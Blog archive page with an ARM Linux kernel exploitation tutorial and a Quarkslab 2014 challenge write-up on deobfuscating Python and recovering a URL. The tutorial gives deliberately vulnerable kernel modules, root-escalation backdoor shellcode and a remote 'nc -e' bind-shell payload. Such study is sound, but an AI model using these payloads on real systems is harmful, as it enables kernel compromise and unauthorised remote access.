In a few words, the EVT is to ARM what the IDT is to x86. In the ARM world, an exception is an event that causes the CPU to stop or pause from executing the current set of instructions. When this exception occurs, the CPU diverts execution to another location called an exception handler. There are 7 exception types and each exception type is associated with a mode of operation. Modes of operation affect the processor's "permissions" in regards to system resources. There are in total 7 modes of operation. The following table maps some exception types to their associated modes of operation:

Exception                   |       Mode            |     Description
----------------------------|-----------------------|-------------------------------------------------------------------
Fast Interrupt Request      |      FIQ              |   interrupts requiring fast response and low latency.
Interrupt Request           |      IRQ              |   used for general-purpose interrupt handling.
Software Interrupt or RESET |      Supervisor Mode  |   protected mode for the operating system.
Prefetch or Data Abort      |      Abort Mode       |   when fetching data or an instruction from invalid/unmapped memory.
Undefined Instruction       |      Undefined Mode   |   when an undefined instruction is executed.

The other two modes are User Mode, which is self-explanatory, and System Mode, which is a privileged user mode for the operating system.

The Exceptions

The exceptions change the processor mode and each exception has access to a set of banked registers. These can be described as a set of registers that exist only in the exception's context so modifying them will not affect the banked registers of another exception mode. Different exception modes have different banked registers:

Banked Registers

The Exception Vector Table

The vector table is a table that actually contains control transfer instructions that jump to the respective exception handlers. For example, when a software interrupt is raised, execution is transferred to the software interrupt entry in the table which in turn will jump to the syscall handler. Why is the EVT so interesting to target? Well because it is loaded at a known address in memory and it is writeable* and executable. On 32-bit ARM Linux this address is 0xffff0000. Each entry in the EVT is also at a known offset as can be seen on the following table:

Exception                   |       Address            
----------------------------|-----------------------
Reset                       |      0xffff0000           
Undefined Instruction       |      0xffff0004       
SWI                         |      0xffff0008  
Prefetch Abort              |      0xffff000c       
Data Abort                  |      0xffff0010 
Reserved                    |      0xffff0014  
IRQ                         |      0xffff0018   
FIQ                         |      0xffff001c  
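
Since every entry is a single 4-byte instruction, the table above boils down to base + 4 * index. A quick Python sketch (the names are mine, and the base defaults to the high-vectors address used throughout this article):

```python
EVT_BASE = 0xffff0000  # high vectors, as used by 32-bit ARM Linux in this article

VECTORS = ['Reset', 'Undefined Instruction', 'SWI', 'Prefetch Abort',
           'Data Abort', 'Reserved', 'IRQ', 'FIQ']

def vector_address(name, base=EVT_BASE):
    """Each vector holds one 32-bit instruction, so entries are 4 bytes apart."""
    return base + 4 * VECTORS.index(name)

for name in VECTORS:
    print('%-22s 0x%08x' % (name, vector_address(name)))
```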

A note about the Undefined Instruction exception

Overwriting the Undefined Instruction vector seems like a great plan but it actually isn't because it is used by the kernel. Hard float and Soft float are two solutions that allow emulation of floating point instructions since a lot of ARM platforms do not have hardware floating point units. With soft float, the emulation code is added to the userspace application at compile time. With hard float, the kernel lets the userspace application use the floating point instructions as if the CPU supported them and then using the Undefined Instruction exception, it emulates the instruction inside the kernel.

If you want to read more on the EVT, check out the references at the bottom of this article, or google it.

Corrupting the EVT

There are a few vectors we could use in order to obtain privileged code execution. Clearly, overwriting any vector in the table could potentially lead to code execution, but as the lazy people that we are, let's try to do the least amount of work. The easiest one to overwrite seems to be the Software Interrupt vector. It is executing in process context, system calls go through there, all is well. Let's now go through some PoCs/examples. All the following examples have been tested on Debian 7 ARMel 3.2.0-4-versatile running in qemu.

Local scenario

The example vulnerable module implements a char device that has a pretty blatant arbitrary-write vulnerability (or is it a feature?):

// called when 'write' system call is done on the device file
static ssize_t on_write(struct file *filp,const char *buff,size_t len,loff_t *off)
{
    size_t siz = len;
    void * where = NULL;
    char * what = NULL;

    if(siz > sizeof(where))
        what = buff + sizeof(where);
    else
        goto end;

    copy_from_user(&where, buff, sizeof(where));
    memcpy(where, what, sizeof(void *));

end:
    return siz;
}

Basically, with this cool and realistic vulnerability, you give the module an address followed by data to write at that address. Now, our plan is going to be to backdoor the kernel by overwriting the SWI exception vector with code that jumps to our backdoor code. This code will check for a magic value in a register (say r7 which holds the syscall number) and if it matches, it will elevate the privileges of the calling process. Where do we store this backdoor code? Considering the fact that we have an arbitrary write to kernel memory, we can either store it in userspace or somewhere in kernel space. The good thing about the latter choice is that if we choose an appropriate location in kernel space, our code will exist as long as the machine is running, whereas with the former choice, as soon as our user space application exits, the code is lost and if the entry in the EVT isn't set back to its original value, it will most likely be pointing to invalid/unmapped memory which will crash the system. So we need a location in kernel space that is executable and writeable. Where could this be? Let's take a closer look at the EVT:

EVT Disassembly

As expected we see a bunch of control transfer instructions, but one thing we notice about them is that the "closest" referenced address is 0xffff0200. Let's take a look at what is between the end of the EVT and 0xffff0200:
EVT Inspection

It looks like nothing is there so we have around 480 bytes to store our backdoor which is more than enough.
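
The vulnerable on_write copies exactly one pointer-sized word per call, so anything bigger has to be delivered as a series of 8-byte buffers (address, then 4 bytes of data). Here is a hedged Python sketch of that chunking together with the size check; the function names are mine, it assumes a 32-bit little-endian target (ARMel) and that zero padding of the last word is harmless.

```python
import struct

CAVE_START = 0xffff0020  # first byte after the eight vectors
CAVE_END = 0xffff0200    # closest address referenced by the vectors

def fits_in_cave(where, size):
    """True if [where, where + size) stays inside the unused area."""
    return CAVE_START <= where and where + size <= CAVE_END

def write_requests(where, payload, word=4):
    """One buffer per 32-bit word: target address followed by the word to store."""
    payload = payload + b'\x00' * (-len(payload) % word)  # assumption: padding with zeros is fine
    return [struct.pack('<I', where + off) + payload[off:off + word]
            for off in range(0, len(payload), word)]

print(CAVE_END - CAVE_START)  # 480
```

Each returned buffer would then go through a single write() on the device file, which also satisfies the len > sizeof(where) check in the module.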

The Exploit

Recapitulating our exploit:
1. Store our backdoor at 0xffff0020.
2. Overwrite the SWI exception vector with a branch to 0xffff0020.
3. When a system call occurs, our backdoor will check if r7 == 0xb0000000 and if true, elevate the privileges of the calling process otherwise jump to the normal system call handler.
Here is the backdoor's code:

;check if magic
    cmp     r7, #0xb0000000
    bne     exit

elevate:
    stmfd   sp!,{r0-r12}

    mov     r0, #0
    ldr     r3, =0xc0049a00     ;prepare_kernel_cred
    blx     r3
    ldr     r4, =0xc0049438     ;commit_creds
    blx     r4

    ldmfd   sp!, {r0-r12, pc}^  ;return to userland

;go to syscall handler
exit:
    ldr     pc, [pc, #980]      ;go to normal swi handler
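
Two numbers in this exploit are worth double checking: the branch we write over the SWI vector and the #980 offset in the last instruction. The Python sketch below encodes both ARM instructions by hand. The function names are mine, and it assumes the backdoor is assembled at 0xffff0020 with the exit label at +0x24 (nine 4-byte instructions in) and that the original SWI vector loads its handler address from the literal at 0xffff0420.

```python
def encode_b(insn_addr, target):
    """Unconditional ARM branch: imm24 is the word offset from insn_addr + 8."""
    delta = target - (insn_addr + 8)
    if delta % 4 or not -(1 << 25) <= delta < (1 << 25):
        raise ValueError('target out of range or misaligned')
    return 0xea000000 | ((delta >> 2) & 0xffffff)

def encode_ldr_pc_literal(insn_addr, literal_addr):
    """ldr pc, [pc, #imm12] with a positive offset; pc reads as insn_addr + 8."""
    imm = literal_addr - (insn_addr + 8)
    if not 0 <= imm < 0x1000:
        raise ValueError('literal not reachable with a positive 12-bit offset')
    return 0xe59ff000 | imm

print(hex(encode_b(0xffff0008, 0xffff0020)))               # 0xea000004
print(hex(encode_ldr_pc_literal(0xffff0008, 0xffff0420)))  # 0xe59ff410
print(encode_ldr_pc_literal(0xffff0044, 0xffff0420) & 0xfff)  # 980
```

The second value is the original content of the SWI vector (ldr pc, [pc, #1040]), and the third one shows that #980 makes the backdoor load the very same handler pointer.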

You can find the complete code for the vulnerable module and the exploit here. Run the exploit:

Local PoC

Remote scenario

For this example, we will use a netfilter module with a similar vulnerability as the previous one:

if(ip->protocol == IPPROTO_TCP){
    tcp = (struct tcphdr *)(skb_network_header(skb) + ip_hdrlen(skb));
    currport = ntohs(tcp->dest);
    if((currport == 9999)){
        tcp_data = (char *)((unsigned char *)tcp + (tcp->doff * 4));
        where = ((void **)tcp_data)[0];
        len = ((uint8_t *)(tcp_data + sizeof(where)))[0];
        what = tcp_data + sizeof(where) + sizeof(len);
        memcpy(where, what, len);
    }
}

Just like the previous example, this module has an awesome feature that allows you to write data anywhere you want. Connect to port tcp/9999 and just give it an address, followed by the size of the data and the actual data to write there. In this case we will also backdoor the kernel by overwriting the SWI exception vector. The code will branch to our shellcode which we will also, as in the previous example, store at 0xffff0020. Overwriting the SWI vector is especially a good idea in this remote scenario because it will allow us to switch from interrupt context to process context. So our backdoor will be executing in a context with a backing process and we will be able to "hijack" this process and overwrite its code segment with a bind shell or connect back shell. But let's not do it that way. Let's check something real quick:

cat /proc/self/maps

Would you look at that, on top of everything else, the EVT is a shared memory segment. It is executable from user land and writeable from kernel land*. Instead of overwriting the code segment of a process that is making a system call, let's just store our code in the EVT right after our first stage and just return there. Every system call goes through the SWI vector so we won't have to wait too much for a process to get caught in our trap.

The Exploit

Our exploit goes:
1. Store our first stage and second stage shellcodes at 0xffff0020 (one after the other).
2. Overwrite the SWI exception vector with a branch to 0xffff0020.
3. When a system call occurs, our first stage shellcode will set the link register to the address of our second stage shellcode (which is also stored in the EVT and which will be executed from userland), and then return to userland.
4. The calling process will "resume execution" at the address of our second stage which is just a bind shell.
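
On the wire, each write is just the layout the module parses: a 4-byte address, a 1-byte length, then the data. Here is a rough Python sketch of how the payloads for the steps above could be built. The function names are mine, branch_word is the already-encoded branch instruction (left to the caller), and little-endian packing is assumed since the target is ARMel.

```python
import struct

def write_packet(where, data):
    """TCP payload for one write: address, uint8_t length, bytes to copy."""
    if not 0 < len(data) <= 0xff:
        raise ValueError('len is a uint8_t, so one packet carries 1 to 255 bytes')
    return struct.pack('<IB', where, len(data)) + data

def plan_writes(shellcode, branch_word, cave=0xffff0020, swi_vector=0xffff0008):
    """Shellcode chunks first, the vector overwrite last."""
    packets = [write_packet(cave + off, shellcode[off:off + 0xff])
               for off in range(0, len(shellcode), 0xff)]
    packets.append(write_packet(swi_vector, struct.pack('<I', branch_word)))
    return packets
```

The ordering is deliberate: the vector is only redirected once both stages are fully in place, otherwise the very next system call would branch into half-written code.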

Here is the stage 1-2 shellcode:

stage_1:
    adr     lr, stage_2
    push    {lr}
    stmfd   sp!, {r0-r12}
    ldr     r0, =0xe59ff410     ; initial value at 0xffff0008 which is
                                ; ldr     pc, [pc, #1040] ; 0xffff0420
    ldr     r1, =0xffff0008
    str     r0, [r1]
    ldmfd   sp!, {r0-r12, pc}^  ; return to userland

stage_2:
    ldr     r0, =0x6e69622f     ; /bin
    ldr     r1, =0x68732f2f     ; //sh
    eor     r2, r2, r2          ; 0x00000000
    push    {r0, r1, r2}
    mov     r0, sp

    ldr     r4, =0x0000632d     ; -c\x00\x00
    push    {r4}
    mov     r4, sp

    ldr     r5, =0x2d20636e
    ldr     r6, =0x3820706c
    ldr     r7, =0x20383838     ; nc -lp 8888 -e /bin///sh
    ldr     r8, =0x2f20652d
    ldr     r9, =0x2f6e6962
    ldr     r10, =0x68732f2f

    eor     r11, r11, r11
    push    {r5-r11}
    mov     r5, sp
    push    {r2}

    eor     r6, r6, r6
    push    {r0,r4,r5, r6}
    mov     r1, sp
    mov     r7, #11
    swi     0x0

    mov     r0, #99
    mov     r7, #1
    swi     0x0
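
If you want to check what those magic constants spell, packing them back as little-endian words is enough. A small Python 3 sketch (the helper name is mine):

```python
import struct

def words_to_bytes(*words):
    """Lay out 32-bit values the way push stores them on a little-endian stack."""
    return b''.join(struct.pack('<I', w) for w in words)

print(words_to_bytes(0x6e69622f, 0x68732f2f))  # b'/bin//sh'
print(words_to_bytes(0x0000632d))              # b'-c\x00\x00'
print(words_to_bytes(0x2d20636e, 0x3820706c, 0x20383838,
                     0x2f20652d, 0x2f6e6962, 0x68732f2f))
# b'nc -lp 8888 -e /bin///sh'
```

The extra slashes are only there to keep every chunk exactly 4 bytes long; the kernel treats consecutive slashes in a path as one.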

You can find the complete code for the vulnerable module and the exploit here. Run the exploit:

Remote PoC

Bonus: Interrupt Stack Overflow

It seems like the Interrupt Stack is adjacent to the EVT in most memory layouts. Who knows what kind of interesting things would happen if there was something like a stack overflow ?

A Few Things about all this

  • The techniques discussed in this article make the assumption that the attacker has knowledge of the kernel addresses, which might not always be the case.
  • The location where we are storing our shellcode (0xffff0020) might or might not be used by another distro's kernel.
  • The example code I wrote here is merely a PoC; it could definitely be improved. For example, in the remote scenario, if it turns out that the init process is the process being hijacked, the box will crash after we exit from the bind shell.
  • If you hadn't noticed, the "vulnerabilities" presented here, aren't really vulnerabilities but that is not the point of this article.

*: It seems like the EVT can be mapped read-only and therefore there is the possibility that it might not be writeable in newer/some versions of the Linux kernel.

Final words

Among other things, grsec prevents the modification of the EVT by making the page read-only. If you want to play with some fun kernel challenges, check out the "kernelpanic" branch on w3challs.
Cheers, @amatcama

References

[1] Vector Rewrite Attack
[2] Recent ARM Security Improvements
[3] Entering an Exception
[4] SWI handlers
[5] ARM Exceptions
[6] Exception and Interrupt Handling in ARM

Dissection of Quarkslab's 2014 security challenge

Introduction

As the blog was a bit silent for quite some time, I figured it would be cool to put together a post ; so here it is folks, dig in!

The French company Quarkslab recently released a security challenge to win a free entrance to attend the upcoming HITBSecConf conference in Kuala Lumpur from the 13th of October until the 16th.

The challenge has been written by Serge Guelton, an R&D engineer specialized in compilers/parallel computations. At the time of writing, eight different people have already managed to solve the challenge, and one of the tickets seems to have been won by hackedd, so congrats to him!

According to the description of the challenge Python is heavily involved, which is a good thing for at least two reasons:

In this post I will describe how I tackled this problem, how I managed to solve it. And to make up for me being slow at solving it I tried to make it fairly detailed.

At first it was supposed to be quite short, but well.. I decided to fully analyze the challenge even if it wasn't needed to find the key, so it is a bit longer than expected :-).

Anyway, sit down, make yourself at home and let me pour you a cup of tea before we begin :-).

Finding the URL of the challenge

Very one-liner, much lambdas, such a pain

The first part of the challenge is to retrieve a URL hidden in the following Python one-liner:

(lambda g, c, d: (lambda _: (_.__setitem__('$', ''.join([(_['chr'] if ('chr'
in _) else chr)((_['_'] if ('_' in _) else _)) for _['_'] in (_['s'] if ('s'
in _) else s)[::(-1)]])), _)[-1])( (lambda _: (lambda f, _: f(f, _))((lambda
__,_: ((lambda _: __(__, _))((lambda _: (_.__setitem__('i', ((_['i'] if ('i'
in _) else i) + 1)),_)[(-1)])((lambda _: (_.__setitem__('s',((_['s'] if ('s'
in _) else s) + [((_['l'] if ('l' in _) else l)[(_['i'] if ('i' in _) else i
)] ^ (_['c'] if ('c' in _) else c))])), _)[-1])(_))) if (((_['g'] if ('g' in
_) else g) % 4) and ((_['i'] if ('i' in _) else i)< (_['len'] if ('len' in _
) else len)((_['l'] if ('l' in _) else l)))) else _)), _) ) ( (lambda _: (_.
__setitem__('!', []), _.__setitem__('s', _['!']), _)[(-1)] ) ((lambda _: (_.
__setitem__('!', ((_['d'] if ('d' in _) else d) ^ (_['d'] if ('d' in _) else
d))), _.__setitem__('i', _['!']), _)[(-1)])((lambda _: (_.__setitem__('!', [
(_['j'] if ('j' in _) else j) for  _[ 'i'] in (_['zip'] if ('zip' in _) else
zip)((_['l0'] if ('l0' in _) else l0), (_['l1'] if ('l1' in _) else l1)) for
_['j'] in (_['i'] if ('i' in _) else i)]), _.__setitem__('l', _['!']), _)[-1
])((lambda _: (_.__setitem__('!', [1373, 1281, 1288, 1373, 1290, 1294, 1375,
1371,1289, 1281, 1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288,
1375,1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302,
1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374, 1365, 1302
]), _.__setitem__('l1',_['!']), _)[-1])((lambda _: (_.__setitem__('!',[1375,
1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280, 1368, 1368,1294,
1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375, 1280, 1372, 1281, 1293,1373,
1371, 1354, 1370, 1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303,1368,
1354, 1355, 1356, 1303, 1366, 1371]), _.__setitem__('l0', _['!']), _)[(-1)])
            ({ 'g': g, 'c': c, 'd': d, '$': None})))))))['$'])

I think that was the first time I was seeing obfuscated Python and believe me I did a really strange face when seeing that snippet. But well, with a bit of patience we should manage to get a better understanding of how it is working, let's get to it!

Tidying up the last one..

Before doing that here are things we can directly observe just by looking closely at the snippet:

  • We know this function has three arguments ; we don't know them at this point though
  • The snippet seems to reuse __setitem__ quite a lot ; it may mean two things for us:
      • The only standard Python object I know of with a __setitem__ function is the dictionary,
      • The way the snippet looks, it seems that once we understand one of those __setitem__ calls, we will understand them all
  • The following standard functions are used: chr, len, zip
      • That means manipulation of strings, integers and iterables
  • There are two noticeable operators: mod and xor

With all that information up our sleeve, the first thing I did was to try to clean it up, starting from the last lambda in the snippet. It gives something like:

tab0 = [
    1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293,
    1280, 1368, 1368, 1294, 1293, 1368, 1372, 1292, 1290, 1291,
    1371, 1375, 1280, 1372, 1281, 1293, 1373, 1371, 1354, 1370,
    1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303, 1368,
    1354, 1355, 1356, 1303, 1366, 1371
]

z = lambda x: (
    x.__setitem__('!', tab0),
    x.__setitem__('l0', x['!']),
    x
)[-1]

That lambda takes a dictionary x, sets two items, generates a tuple with a reference to the dictionary at the end of the tuple ; finally the lambda is going to return that same dictionary. It also uses x['!'] as a temporary variable to then assign its value to x['l0'].

Long story short, it basically takes a dictionary, updates it and returns it to the caller: clever trick to pass that same object across lambdas. We can also see that easily in Python directly:

In [8]: d = {}
In [9]: z(d)
Out[9]:
{'!': [1375,
    ...
    'l0': [1375,
    ...
}
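
The trick is easier to see on a toy example. The sketch below (Python 3, with names of my own) chains two such lambdas: each one mutates the dictionary through __setitem__, which returns None, and the trailing [-1] on the tuple hands the dictionary itself to the next stage.

```python
# Each stage: do the side effect, then return the same dictionary
set_a = lambda env: (env.__setitem__('a', 1), env)[-1]
set_b = lambda env: (env.__setitem__('b', env['a'] + 1), env)[-1]

env = set_b(set_a({}))
print(env)  # {'a': 1, 'b': 2}

# The lookup idiom used everywhere in the snippet: prefer the dictionary,
# fall back to a real name (here the builtin len) when the key is missing.
length = (env['len'] if ('len' in env) else len)([1, 2, 3])
print(length)  # 3
```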

That lambda is even called with a dictionary that will contain, among other things, the three user-controlled variables: g, c, d. That dictionary seems to be some kind of storage used to keep track of all the variables that will be used across those lambdas.

# Returns { 'g': g, 'c': c, 'd': d, '$':None, '!':tab0, 'l0':tab0}
last_res = (
    (
        lambda x: (
            x.__setitem__('!', tab0),
            x.__setitem__('l0', x['!']),
            x
        )[-1]
    )
    ({ 'g': g, 'c': c, 'd': d, '$': None})
)

..then the one before...

Now if we repeat that same operation with the one before the last lambda, we have the exact same pattern:

tab1 = [
    1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371, 1289, 1281,
    1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288,
    1375, 1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355,
    1366, 1372, 1302, 1360, 1368, 1354, 1364, 1370, 1371, 1365,
    1362, 1368, 1352, 1374, 1365, 1302
]

zz = lambda x: (
    x.__setitem__('!', tab1),
    x.__setitem__('l1', x['!']),
    x
)[-1]

Perfect, now let's repeat the same operations over and over again. At some point, the whole thing becomes crystal clear (sort-of):

# Returns { 
    # 'g':g, 'c':c, 'd':d,
    # '!':[],
    # 's':[],
    # 'l':[j for i in zip(tab0, tab1) for j in i],
    # 'l1':tab1,
    # 'l0':tab0,
    # 'i': 0,
    # 'j': 1302,
    # '$':None
#}
res_after_all_operations = (
    (
    lambda x: (
        x.__setitem__('!', []),
        x.__setitem__('s', x['!']),
        x
    )[-1]
    )
    # ..
    (
    (
        lambda x: (
            x.__setitem__('!', ((x['d'] if ('d' in x) else d) ^ (x['d'] if ('d' in x) else d))),
            x.__setitem__('i', x['!']),
            x
        )[-1]
    )
    # ..
    (
        (
        lambda x: (
            x.__setitem__('!', [(x['j'] if ('j' in x) else j) for x[ 'i'] in (x['zip'] if ('zip' in x) else zip)((x['l0'] if ('l0' in x) else l0), (x['l1'] if ('l1' in x) else l1)) for x['j'] in (x['i'] if ('i' in x) else i)]),
            x.__setitem__('l', x['!']),
            x
        )[-1]
        )
        # Returns { 'g':g, 'c':c, 'd':d, '!':tab1, 'l1':tab1, 'l0':tab0, '$':None}
        (
        (
            lambda x: (
                x.__setitem__('!', tab1),
                x.__setitem__('l1', x['!']),
                x
            )[-1]
        )
        # Returns { 'g':g, 'c':c, 'd':d, '!':tab0, 'l0':tab0, '$':None }
        (
            (
            lambda x: (
                x.__setitem__('!', tab0),
                x.__setitem__('l0', x['!']),
                x
            )[-1]
            )
            ({ 'g': g, 'c': c, 'd': d, '$': None})
        )
        )
    )
    )
)
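
The weirdest-looking stage is the one building x['l']: the list comprehension uses dictionary entries as loop targets, which is legal Python, so x['i'] and x['j'] are left holding the last values seen. Here is a reduced Python 3 sketch with two tiny made-up tables instead of tab0 and tab1 (the function name is mine):

```python
def interleave(env):
    # Same shape as the lambda: 'for env[...] in' assigns into the dictionary at each step
    env['!'] = [env['j'] for env['i'] in zip(env['l0'], env['l1']) for env['j'] in env['i']]
    env['l'] = env['!']
    return env

env = interleave({'l0': [1, 3, 5], 'l1': [2, 4, 6]})
print(env['l'])  # [1, 2, 3, 4, 5, 6]
print(env['i'])  # (5, 6)
print(env['j'])  # 6
```

This is why the state dump above shows 'j': 1302: it is simply the last element of tab1 left over from the loop, while 'i' is reset to zero by the next stage.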

Putting it all together

After doing all of that, we know now the types of the three variables the function needs to work properly (and we don't really need more to be honest):

  • g is an integer that will be taken mod 4
      • if the value is divisible by 4, the function returns nothing ; so we will need to have this variable set to 1 for example
  • c is another integer that looks like a xor key ; if we look at the snippet, this variable is used to xor each element of x['l'] (which is the table interleaving tab0 and tab1)
      • this is the interesting parameter
  • d is another integer that we can also ignore: it's only used to set x['i'] to zero by xoring x['d'] with itself.
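
Put differently, once the lambdas are peeled off, the whole one-liner seems to boil down to a few lines. The following is my own plain rewrite of that logic in Python 3, not the challenge's code, and it is exercised on a made-up secret and key rather than on the real tables:

```python
def decode(tab0, tab1, g, c, d=0):
    """Plain equivalent of the one-liner: interleave, xor with c, reverse, join."""
    l = [v for pair in zip(tab0, tab1) for v in pair]
    i = d ^ d              # always zero, whatever d is
    s = []
    while g % 4 and i < len(l):
        s.append(l[i] ^ c)
        i += 1
    return ''.join(chr(v) for v in reversed(s))

# Round trip on hypothetical data: encode a string the way the tables were presumably built
secret, key = 'hello!', 0x42
encoded = [ord(ch) ^ key for ch in reversed(secret)]
tab0, tab1 = encoded[0::2], encoded[1::2]

print(decode(tab0, tab1, g=1, c=key))        # hello!
print(repr(decode(tab0, tab1, g=4, c=key)))  # ''
```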

We don't need anything else really now: no more lambdas, no more pain, no more tears. It is time to write what I call, an educated brute-forcer, to find the correct value of c:

import sys

def main(argc, argv):
    tab0 = [1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280, 1368, 1368,1294, 1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375, 1280, 1372, 1281, 1293,1373, 1371, 1354, 1370, 1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303,1368, 1354, 1355, 1356, 1303, 1366, 1371]
    tab1 = [1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371,1289, 1281, 1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288, 1375,1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302, 1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374, 1365, 1302]

    func = (
        lambda g, c, d: 
        (
            lambda x: (
                x.__setitem__('$', ''.join([(x['chr'] if ('chr' in x) else chr)((x['_'] if ('_' in x) else x)) for x['_'] in (x['s'] if ('s' in x) else s)[::-1]])),
                x
            )[-1]
        )
        (
            (
                lambda x: 
                    (lambda f, x: f(f, x))
                (
                    (
                        lambda __, x: 
                        (
                            (lambda x: __(__, x))
                            (
                                # i += 1
                                (
                                    lambda x: (
                                        x.__setitem__('i', ((x['i'] if ('i' in x) else i) + 1)),
                                        x
                                    )[-1]
                                )
                                (
                                    # s += [c ^ l[i]]
                                    (
                                        lambda x: (
                                            x.__setitem__('s', (
                                                    (x['s'] if ('s' in x) else s) +
                                                    [((x['l'] if ('l' in x) else l)[(x['i'] if ('i' in x) else i)] ^ (x['c'] if ('c' in x) else c))]
                                                )
                                            ),
                                            x
                                        )[-1]
                                    )
                                    (x)
                                )
                            )
                            # if ((x['g'] % 4) and (x['i'] < len(l))) else x
                            if (((x['g'] if ('g' in x) else g) % 4) and ((x['i'] if ('i' in x) else i)< (x['len'] if ('len' in x) else len)((x['l'] if ('l' in x) else l))))
                            else x
                        )
                    ),
                    x
                )
            )
            # Returns { 'g':g, 'c':c, 'd':d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': 0, 'j': 1302, '!':0, 's':[] }
            (
                (
                    lambda x: (
                        x.__setitem__('!', []),
                        x.__setitem__('s', x['!']),
                        x
                    )[-1]
                )
                # Returns { 'g':g, 'c':c, 'd':d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': 0, 'j': 1302, '!':0}
                (
                    (
                        lambda x: (
                            x.__setitem__('!', ((x['d'] if ('d' in x) else d) ^ (x['d'] if ('d' in x) else d))),
                            x.__setitem__('i', x['!']),
                            x
                        )[-1]
                    )
                    # Returns { 'g' : g, 'c', 'd': d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': (1371, 1302), 'j': 1302}
                    (
                        (
                            lambda x: (
                                x.__setitem__('!', [(x['j'] if ('j' in x) else j) for x[ 'i'] in (x['zip'] if ('zip' in x) else zip)((x['l0'] if ('l0' in x) else l0), (x['l1'] if ('l1' in x) else l1)) for x['j'] in (x['i'] if ('i' in x) else i)]),
                                x.__setitem__('l', x['!']),
                                x
                            )[-1]
                        )
                        # Returns { 'g' : g, 'c', 'd': d, '!':tab1, 'l1':tab1, 'l0':tab0}
                        (
                            (
                                lambda x: (
                                    x.__setitem__('!', tab1),
                                    x.__setitem__('l1', x['!']),
                                    x
                                )[-1]
                            )
                            # Return { 'g' : g, 'c', 'd': d, '!' : tab0, 'l0':tab0}
                            (
                                (
                                    lambda x: (
                                        x.__setitem__('!', tab0),
                                        x.__setitem__('l0', x['!']),
                                        x
                                    )[-1]
                                )
                                ({ 'g': g, 'c': c, 'd': d, '$': None})
                            )
                        )
                    )
                )
            )
        )['$']
    )

    for i in range(0x1000):
        try:
            ret = func(1, i, 0)
            if 'quarks' in ret:
                print ret
        except:
            pass
    return 1

if __name__ == '__main__':
    sys.exit(main(len(sys.argv), sys.argv))

And after running it, we are good to go:

D:\Codes\challenges\ql-python>bf_with_lambdas_cleaned.py
/blog.quarkslab.com/static/resources/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
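
For comparison, here is a lambda-free sketch of what the snippet above boils down to: interleave tab0 and tab1, XOR every element with c, reverse the result and turn it into characters. The helper names decode and brute_force are made up for this illustration, and the sketch targets Python 3 rather than the Python 2 used in the rest of the post.

```python
tab0 = [1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280,
        1368, 1368, 1294, 1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375,
        1280, 1372, 1281, 1293, 1373, 1371, 1354, 1370, 1356, 1354, 1355,
        1370, 1357, 1357, 1302, 1366, 1303, 1368, 1354, 1355, 1356, 1303,
        1366, 1371]
tab1 = [1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371, 1289, 1281, 1280,
        1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288, 1375, 1375,
        1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302,
        1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374,
        1365, 1302]


def decode(key):
    """Hypothetical helper: redo the lambda chain for one candidate key."""
    # x['l'] in the original: tab0 and tab1 interleaved element by element.
    table = [value for pair in zip(tab0, tab1) for value in pair]
    # XOR every element with the key and read the result backwards.
    return ''.join(chr(value ^ key) for value in reversed(table))


def brute_force(limit=0x1000, marker='quarks'):
    """Hypothetical helper: keep the keys whose output contains the marker."""
    return [key for key in range(limit) if marker in decode(key)]


if __name__ == '__main__':
    for key in brute_force():
        print(hex(key), decode(key))
```

Python 3's chr accepts any code point, so the try/except of the Python 2 version (where chr rejects values above 255) is not needed here.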

A custom ELF64 Python interpreter you shall debug

Recon

All right, here we are: we now have the real challenge. First, let's see what kind of information we get for free:

overclok@wildout:~/chall/ql-py$ file b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs),
for GNU/Linux 2.6.26, not stripped

overclok@wildout:~/chall/ql-py$ ls -lah b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
-rwxrw-r-x 1 overclok overclok 7.9M Sep  8 21:03 b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf

The binary is quite big, not good for us. But on the other hand, the binary isn't stripped so we might find useful debugging information at some point.

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

That does explain the size of the binary then: we basically have something that looks like a custom Python interpreter. Note that I also remembered reading Building an obfuscated Python interpreter: we need more opcodes on Quarkslab's blog where Serge described how you could tweak the interpreter sources to add / change some opcodes either for optimization or obfuscation purposes.

